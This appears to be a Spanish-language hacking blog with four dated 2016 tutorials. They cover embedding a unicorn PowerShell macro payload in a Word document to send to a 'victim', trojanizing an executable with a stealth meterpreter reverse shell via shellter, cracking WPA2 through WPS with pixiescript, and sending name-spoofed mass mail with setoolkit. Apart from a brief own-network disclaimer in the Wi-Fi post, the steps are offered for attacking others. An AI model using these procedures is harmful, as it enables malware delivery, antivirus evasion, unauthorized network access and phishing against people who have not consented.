viernes, 27 de mayo de 2016

Infectado un documento de word

Descargamos unicorn desde https://github.com/trustedsec/unicorn



Descomprimimos en una carpeta, la que queramos.



con ./unicorn.py vemos la ayuda



Creamos el payload

./unicorn.py payload_a_crear_ LHOST LPORT macro





nos ha creado el archivo powershell_attack.txt donde estará el macro del payload.



vista → macro → ver macro







Añadimos el nombre de nuestra macro



crear



copiamos el codigo



Borramos la parte de arriba y cambiamos sub Auto_open() por sub AutoOpen()



Si queremos, podemos borrar las líneas señaladas



Yo las voy a borrar



Guardamos la macro, y lo pasamos a la víctima

Ejecutamos el listener

msfconsole -r unicorn.rc



En cuanto abra el archivo





viernes, 20 de mayo de 2016

Creando un payload indetectable e inyectándolo en un ejecutable con shellter

La aplicación shellter nos permite crear un payload indetectable y, por si eso fuese poco, lo va a inyectar en un archivo ejecutable.

Es una aplicación para windows, sin embargo, podremos usarla en nuestra distribución GNU/LINUX con el emulador wine.

Nos vamos a http://www.shellterproject.com , vamos a la sección de descargas y nos descargamos la última versión



Copiamos el archivo .zip en la carpeta que queramos y descomprimimos

unzip shellter.zip



Nos metemos en el directorio /shellter/ y ejecutamos

wine shellter.exe



Le doy a A, para que lo haga todo automático



Ponemos el programa que queremos troyanizar (el original nos lo guardará en la subcarpeta backups)



Voy a decir que active el modo Stealth (sigilo)



Elijo el payload, yo elegiré meterpreter_reverse_tcp, por tanto le digo que voy a utilizar un payload listado (L) y elijo el número del que yo quiero, que en este caso era el 1. Podría haber cogido uno personalizado si hubiese querido. Si, cuando configuremos, queremos poner un nombre de domnio en lugar de la dirección IP en LHOST, tendremos que elegir o bien meterpreter_reverse_http o meterpreter_reverse_https



Configuro LHOST y LPORT









viernes, 13 de mayo de 2016

Crackeando WPA2 en pocos minutos con pixiescript

WPS es una manera de conectarse a la red wifi encriptada con WPA2, que nos permite que, para impresoras, móviles, tablets, etc. Poder introducir un pin de 8 dígitos en lugar de la larga y compleja contraseña.

Esto provoca una vulnerabilidad en la que, probando distintos pins por fuerza bruta, podremos obtener la contraseña de la red, para ello se utiliza el programa reaver.

Algunos routers pueden bloquearlo haciendo que haya que apretar un botón del router o algo similar para poder aceptar la terminal, en otros casos, sin embargo, enviando un paquete mal formado, el router nos puede dar ciertos parámetros a través de los cuales podremos averiguar el pin correcto, y, por tanto, la clave WIFI.

Una manera automatizada es a través del script pixiescript, disponible en la última versión de WIFISLAX (http://www.wifislax.com).

En este tutorial explicaremos como se usa este script, sin embargo, recuerda que el fin de este post es poder auditar la vulnerabilidad de tu propia red, y no para conseguir la contraseña de algún otro de manera ilegal.

En primer lugar abrimos la aplicación.



Elegimos la tarjeta de red inalámbricca y la ponemos en modo monitor



Le damos a iniciar escaneo





Nos encontramos distintos símbolos:

  • La marca verde significa que es vulnerable.
  • La interrogación (señalada en el dibujo de arriba) significa que no ha obtenido suficientes datos.
  • El signo de peligro con la exclamación nos dice que no lo ha conseguido, pero que es vulnerable.
  • El signo de dirección prohibida nos dice que no es vulnerable.

Elegimos el modo de ataque, si queremos atacar todos los puntos de acceso, sólo uno o realizar el ataque manual.

Como vamos a auditar nuestra propia red, elegiremos ataque manual.

Tras unos pocos minutos, podremos (si es que es vulnerable) obtener el pin y nos dará la opción de obtener la contraseña.

Podremos encontrar la contraseña en el el menú "Menú --> Contraseñas. ".

Si ha conseguido sacar la contraseña, nos aparecerá, al lado del BSSID, una estrella amarilla.

viernes, 6 de mayo de 2016

SPAM con setoolkit

En este caso, no podremos falsear la dirección de correo origen, pero sí podemos falsear el nombre; de este modo, podremos saltarnos la carpeta de spam.

Instalaremos nuestro propio servidor de correo (sendmail) y usaremos una cuenta gmail creada por nosotros.

Comenzamos instalando sendmail:

apt-get install sendmail-bin

apt-get install sendmail

modificamos en /etc/setoolkit/set.config:

SENDMAIL=OFF

por

SENDMAIL=ON

Ejecutamos setoolkit:

setoolkit

actualizamos la configuración de set

Elegimos la opción mass mail attack

Indicamos que queremos que inicie sendmail

Elegimos si queremos enviar un correo a una persona concreta o a varias a la vez (para este último caso, necesitaremos un archivo con las direcciones).

En mi caso elijo la primera.

Usaré el servidor de gmail con mi cuenta, en caso contrario, usaría otro servidor smtp, donde tendría que poner los parámetros.

Introducimos nuestra cuenta real de gmail

Introducimos el nombre falso que queremos que vea la víctima cuando reciba el correo.

Introducimos la contraseña de nuestro correo gmail.

Indicamos la prioridad del mensaje.

Ponemos el asunto del mensaje.

Elegimos si queremos enviarlo en html (elegimos h) o en texto plano (p). Yo elegiré texto plano.

Escribimos el texto del mensaje y le damos a intro para una nueva línea. Para acabar ponemos END